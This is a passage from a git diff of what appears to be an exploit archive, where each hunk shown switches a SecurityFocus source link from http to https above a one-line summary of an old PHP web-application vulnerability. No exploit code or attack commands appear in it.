vulnerability. diff --git a/exploits/php/webapps/25759.txt b/exploits/php/webapps/25759.txt index dfc48de87..2901bbe31 100644 --- a/exploits/php/webapps/25759.txt +++ b/exploits/php/webapps/25759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25760.txt b/exploits/php/webapps/25760.txt index 8bdc94b89..8ee860202 100644 --- a/exploits/php/webapps/25760.txt +++ b/exploits/php/webapps/25760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25761.txt b/exploits/php/webapps/25761.txt index afa59a3e5..287aeb788 100644 --- a/exploits/php/webapps/25761.txt +++ b/exploits/php/webapps/25761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25762.txt b/exploits/php/webapps/25762.txt index 12964ac45..cac8c6a61 100644 --- a/exploits/php/webapps/25762.txt +++ b/exploits/php/webapps/25762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25763.txt b/exploits/php/webapps/25763.txt index 83774e66f..681a32818 100644 --- a/exploits/php/webapps/25763.txt +++ b/exploits/php/webapps/25763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25764.txt b/exploits/php/webapps/25764.txt index 9b9ab8710..b71dcd2ae 100644 --- a/exploits/php/webapps/25764.txt +++ b/exploits/php/webapps/25764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25765.txt b/exploits/php/webapps/25765.txt index a99c8e85d..bde21e687 100644 --- a/exploits/php/webapps/25765.txt +++ b/exploits/php/webapps/25765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25766.txt b/exploits/php/webapps/25766.txt index f5a33d833..e5fc8d317 100644 --- a/exploits/php/webapps/25766.txt +++ b/exploits/php/webapps/25766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25767.txt b/exploits/php/webapps/25767.txt index 3782e5764..306d2d22a 100644 --- a/exploits/php/webapps/25767.txt +++ b/exploits/php/webapps/25767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25768.txt b/exploits/php/webapps/25768.txt index 0fd65bd71..7a96a3e14 100644 --- a/exploits/php/webapps/25768.txt +++ b/exploits/php/webapps/25768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25769.txt b/exploits/php/webapps/25769.txt index 07a868943..ed5ee9048 100644 --- a/exploits/php/webapps/25769.txt +++ b/exploits/php/webapps/25769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25770.txt b/exploits/php/webapps/25770.txt index 553d87f72..a2e9f9425 100644 --- a/exploits/php/webapps/25770.txt +++ b/exploits/php/webapps/25770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25771.txt b/exploits/php/webapps/25771.txt index 1691909a0..98df5dba3 100644 --- a/exploits/php/webapps/25771.txt +++ b/exploits/php/webapps/25771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25772.txt b/exploits/php/webapps/25772.txt index 5bfce13ba..0778853eb 100644 --- a/exploits/php/webapps/25772.txt +++ b/exploits/php/webapps/25772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25773.txt b/exploits/php/webapps/25773.txt index 7b142bc8d..3fbbcfba9 100644 --- a/exploits/php/webapps/25773.txt +++ b/exploits/php/webapps/25773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25774.txt b/exploits/php/webapps/25774.txt index 3252e78cb..eb6dbb9a6 100644 --- a/exploits/php/webapps/25774.txt +++ b/exploits/php/webapps/25774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25777.txt b/exploits/php/webapps/25777.txt index 3d72153d0..8e641a0fc 100644 --- a/exploits/php/webapps/25777.txt +++ b/exploits/php/webapps/25777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13822/info +source: https://www.securityfocus.com/bid/13822/info PowerDownload is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25778.txt b/exploits/php/webapps/25778.txt index f7721b1f3..9787be7a3 100644 --- a/exploits/php/webapps/25778.txt +++ b/exploits/php/webapps/25778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13825/info +source: https://www.securityfocus.com/bid/13825/info Calendarix is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25779.txt b/exploits/php/webapps/25779.txt index c09c141d9..62e032b14 100644 --- a/exploits/php/webapps/25779.txt +++ b/exploits/php/webapps/25779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13827/info +source: https://www.securityfocus.com/bid/13827/info MyBB is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25786.txt b/exploits/php/webapps/25786.txt index 61d86d5e2..1b618ec22 100644 --- a/exploits/php/webapps/25786.txt +++ b/exploits/php/webapps/25786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13849/info +source: https://www.securityfocus.com/bid/13849/info MWChat is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25787.txt b/exploits/php/webapps/25787.txt index 2ca96db44..130923006 100644 --- a/exploits/php/webapps/25787.txt +++ b/exploits/php/webapps/25787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13850/info +source: https://www.securityfocus.com/bid/13850/info LiteWeb Server is prone to a vulnerability that may let remote attackers bypass authentication. diff --git a/exploits/php/webapps/25788.txt b/exploits/php/webapps/25788.txt index 0b0f62f55..beeb521c2 100644 --- a/exploits/php/webapps/25788.txt +++ b/exploits/php/webapps/25788.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13851/info +source: https://www.securityfocus.com/bid/13851/info Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25792.txt b/exploits/php/webapps/25792.txt index c05f5a4a9..8d4798d7b 100644 --- a/exploits/php/webapps/25792.txt +++ b/exploits/php/webapps/25792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13874/info +source: https://www.securityfocus.com/bid/13874/info YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25793.txt b/exploits/php/webapps/25793.txt index d0dda4620..3fcd8b8cd 100644 --- a/exploits/php/webapps/25793.txt +++ b/exploits/php/webapps/25793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13875/info +source: https://www.securityfocus.com/bid/13875/info YaPiG is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25794.txt b/exploits/php/webapps/25794.txt index 67ce85936..6019a3039 100644 --- a/exploits/php/webapps/25794.txt +++ b/exploits/php/webapps/25794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13877/info +source: https://www.securityfocus.com/bid/13877/info YaPiG is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25799.txt b/exploits/php/webapps/25799.txt index 8e03d11bc..9b94a417a 100644 --- a/exploits/php/webapps/25799.txt +++ b/exploits/php/webapps/25799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25800.txt b/exploits/php/webapps/25800.txt index 33df30a69..0e8728641 100644 --- a/exploits/php/webapps/25800.txt +++ b/exploits/php/webapps/25800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25801.php b/exploits/php/webapps/25801.php index 1a04682b1..0c7fc71a8 100644 --- a/exploits/php/webapps/25801.php +++ b/exploits/php/webapps/25801.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13882/info +source: https://www.securityfocus.com/bid/13882/info Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts. diff --git a/exploits/php/webapps/25803.txt b/exploits/php/webapps/25803.txt index 3b0a995a8..2274edc24 100644 --- a/exploits/php/webapps/25803.txt +++ b/exploits/php/webapps/25803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13897/info +source: https://www.securityfocus.com/bid/13897/info Cerberus Helpdesk is affected by various cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25806.txt b/exploits/php/webapps/25806.txt index d780dc176..c358ba3b9 100644 --- a/exploits/php/webapps/25806.txt +++ b/exploits/php/webapps/25806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13907/info +source: https://www.securityfocus.com/bid/13907/info Invision Gallery is affected by an SQL injection vulnerability. diff --git a/exploits/php/webapps/25808.txt b/exploits/php/webapps/25808.txt index 2782d04e5..f84e5d4c6 100644 --- a/exploits/php/webapps/25808.txt +++ b/exploits/php/webapps/25808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13910/info +source: https://www.securityfocus.com/bid/13910/info Multiple input validation vulnerabilities reportedly affect Invision Community Blog. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25816.txt b/exploits/php/webapps/25816.txt index 9f1ebdf88..ac1d38d07 100644 --- a/exploits/php/webapps/25816.txt +++ b/exploits/php/webapps/25816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13927/info +source: https://www.securityfocus.com/bid/13927/info Ovidentia FX is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25818.txt b/exploits/php/webapps/25818.txt index 8c8ac5e3c..3c0f24a08 100644 --- a/exploits/php/webapps/25818.txt +++ b/exploits/php/webapps/25818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13938/info +source: https://www.securityfocus.com/bid/13938/info Singapore image gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25819.txt b/exploits/php/webapps/25819.txt index 48bdde081..d2f3bea83 100644 --- a/exploits/php/webapps/25819.txt +++ b/exploits/php/webapps/25819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13939/info +source: https://www.securityfocus.com/bid/13939/info FusionBB is affected by multiple vulnerabilities. These issues arise due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25821.txt b/exploits/php/webapps/25821.txt index 2b04b15fc..da49979f7 100644 --- a/exploits/php/webapps/25821.txt +++ b/exploits/php/webapps/25821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13961/info +source: https://www.securityfocus.com/bid/13961/info Annuaire 1Two is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25823.txt b/exploits/php/webapps/25823.txt index 7c5c7984b..f624307ca 100644 --- a/exploits/php/webapps/25823.txt +++ b/exploits/php/webapps/25823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13963/info +source: https://www.securityfocus.com/bid/13963/info McGallery is prone to a file disclosure vulnerability. diff --git a/exploits/php/webapps/25824.txt b/exploits/php/webapps/25824.txt index 5da0202e1..383428731 100644 --- a/exploits/php/webapps/25824.txt +++ b/exploits/php/webapps/25824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13967/info +source: https://www.securityfocus.com/bid/13967/info paFileDB is prone to multiple input validation vulnerabilities. The following issues are reported: diff --git a/exploits/php/webapps/25825.txt b/exploits/php/webapps/25825.txt index afaa09a81..bcdc307c3 100644 --- a/exploits/php/webapps/25825.txt +++ b/exploits/php/webapps/25825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13971/info +source: https://www.securityfocus.com/bid/13971/info Ultimate PHP Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25826.txt b/exploits/php/webapps/25826.txt index dbbfcf5f0..fc9667c3d 100644 --- a/exploits/php/webapps/25826.txt +++ b/exploits/php/webapps/25826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25827.txt b/exploits/php/webapps/25827.txt index 2962df25d..78d7475d8 100644 --- a/exploits/php/webapps/25827.txt +++ b/exploits/php/webapps/25827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25828.txt b/exploits/php/webapps/25828.txt index 47c325b1b..316a26537 100644 --- a/exploits/php/webapps/25828.txt +++ b/exploits/php/webapps/25828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25829.txt b/exploits/php/webapps/25829.txt index 101b5b4b6..85443b997 100644 --- a/exploits/php/webapps/25829.txt +++ b/exploits/php/webapps/25829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25830.txt b/exploits/php/webapps/25830.txt index 013420d7e..dda8428d5 100644 --- a/exploits/php/webapps/25830.txt +++ b/exploits/php/webapps/25830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25831.txt b/exploits/php/webapps/25831.txt index cdb195890..4f1788264 100644 --- a/exploits/php/webapps/25831.txt +++ b/exploits/php/webapps/25831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25832.txt b/exploits/php/webapps/25832.txt index e6b705585..6c25d5997 100644 --- a/exploits/php/webapps/25832.txt +++ b/exploits/php/webapps/25832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25833.txt b/exploits/php/webapps/25833.txt index 603b262bc..ef8074853 100644 --- a/exploits/php/webapps/25833.txt +++ b/exploits/php/webapps/25833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25834.txt b/exploits/php/webapps/25834.txt index 0764a9ea2..2f5ea8236 100644 --- a/exploits/php/webapps/25834.txt +++ b/exploits/php/webapps/25834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13972/info +source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25838.pl b/exploits/php/webapps/25838.pl index 3f0a9941d..59cc85e86 100755 --- a/exploits/php/webapps/25838.pl +++ b/exploits/php/webapps/25838.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13975/info +source: https://www.securityfocus.com/bid/13975/info Ultimate PHP Board is prone to a weak password encryption vulnerability. This issue is due to a failure of the application to protect passwords with a sufficiently effective encryption scheme. diff --git a/exploits/php/webapps/25840.txt b/exploits/php/webapps/25840.txt index 6d295fbcb..2833ba33b 100644 --- a/exploits/php/webapps/25840.txt +++ b/exploits/php/webapps/25840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13979/info +source: https://www.securityfocus.com/bid/13979/info osCommerce is prone to multiple HTTP response splitting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25846.txt b/exploits/php/webapps/25846.txt index bfa78618d..9d2dafd3d 100644 --- a/exploits/php/webapps/25846.txt +++ b/exploits/php/webapps/25846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13996/info +source: https://www.securityfocus.com/bid/13996/info It is reported that cPanel is prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to insufficient sanitization of user-supplied data via the 'user' parameter of the 'login' page. diff --git a/exploits/php/webapps/25848.pl b/exploits/php/webapps/25848.pl index 634853e86..3f5ef71a2 100755 --- a/exploits/php/webapps/25848.pl +++ b/exploits/php/webapps/25848.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13999/info +source: https://www.securityfocus.com/bid/13999/info paFaq is prone to an unauthorized access vulnerability regarding the database. This issue is a result of the application failing to perform access validation on the 'backup.php' script. A remote unauthenticated user can invoke the script and retrieve a complete backup of the application database. diff --git a/exploits/php/webapps/25854.txt b/exploits/php/webapps/25854.txt index 9122c3d5c..f92e27693 100644 --- a/exploits/php/webapps/25854.txt +++ b/exploits/php/webapps/25854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14001/info +source: https://www.securityfocus.com/bid/14001/info paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25856.txt b/exploits/php/webapps/25856.txt index 5d070c1b9..c2c834cb8 100644 --- a/exploits/php/webapps/25856.txt +++ b/exploits/php/webapps/25856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14003/info +source: https://www.securityfocus.com/bid/14003/info paFaq is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25857.txt b/exploits/php/webapps/25857.txt index 03244fea8..8bb8974ff 100644 --- a/exploits/php/webapps/25857.txt +++ b/exploits/php/webapps/25857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14028/info +source: https://www.securityfocus.com/bid/14028/info RaXnet Cacti is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25859.txt b/exploits/php/webapps/25859.txt index 46743caa4..3557bd59d 100644 --- a/exploits/php/webapps/25859.txt +++ b/exploits/php/webapps/25859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14030/info +source: https://www.securityfocus.com/bid/14030/info RaXnet Cacti is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25860.txt b/exploits/php/webapps/25860.txt index 0c1a33fd7..16778d55e 100644 --- a/exploits/php/webapps/25860.txt +++ b/exploits/php/webapps/25860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25861.txt b/exploits/php/webapps/25861.txt index a2a43cc28..114a3d47a 100644 --- a/exploits/php/webapps/25861.txt +++ b/exploits/php/webapps/25861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25862.txt b/exploits/php/webapps/25862.txt index e7cd2be12..46cd879fd 100644 --- a/exploits/php/webapps/25862.txt +++ b/exploits/php/webapps/25862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25875.txt b/exploits/php/webapps/25875.txt index f61cc8a53..1e607adac 100644 --- a/exploits/php/webapps/25875.txt +++ b/exploits/php/webapps/25875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14044/info +source: https://www.securityfocus.com/bid/14044/info Whois.Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25876.txt b/exploits/php/webapps/25876.txt index 9e2cf9e33..308ac2afb 100644 --- a/exploits/php/webapps/25876.txt +++ b/exploits/php/webapps/25876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25877.txt b/exploits/php/webapps/25877.txt index 55146a060..6783100e9 100644 --- a/exploits/php/webapps/25877.txt +++ b/exploits/php/webapps/25877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25878.txt b/exploits/php/webapps/25878.txt index 9a63ef2c8..548e2119c 100644 --- a/exploits/php/webapps/25878.txt +++ b/exploits/php/webapps/25878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25879.txt b/exploits/php/webapps/25879.txt index cfb7e0610..c39306a9b 100644 --- a/exploits/php/webapps/25879.txt +++ b/exploits/php/webapps/25879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25880.txt b/exploits/php/webapps/25880.txt index 5e4d5aa2a..58d8a04f3 100644 --- a/exploits/php/webapps/25880.txt +++ b/exploits/php/webapps/25880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25881.txt b/exploits/php/webapps/25881.txt index ab32ec864..a6bea2ddc 100644 --- a/exploits/php/webapps/25881.txt +++ b/exploits/php/webapps/25881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25882.txt b/exploits/php/webapps/25882.txt index 3724b3354..fdd9a9a8b 100644 --- a/exploits/php/webapps/25882.txt +++ b/exploits/php/webapps/25882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25884.txt b/exploits/php/webapps/25884.txt index 511956ca3..02bc764d8 100644 --- a/exploits/php/webapps/25884.txt +++ b/exploits/php/webapps/25884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25885.txt b/exploits/php/webapps/25885.txt index c5a240160..20febb8ee 100644 --- a/exploits/php/webapps/25885.txt +++ b/exploits/php/webapps/25885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25886.txt b/exploits/php/webapps/25886.txt index df9bbe14e..96c1fbba5 100644 --- a/exploits/php/webapps/25886.txt +++ b/exploits/php/webapps/25886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25887.txt b/exploits/php/webapps/25887.txt index 0826cb2d6..1a41ba037 100644 --- a/exploits/php/webapps/25887.txt +++ b/exploits/php/webapps/25887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25888.txt b/exploits/php/webapps/25888.txt index f29b80e60..f3b05c611 100644 --- a/exploits/php/webapps/25888.txt +++ b/exploits/php/webapps/25888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25889.txt 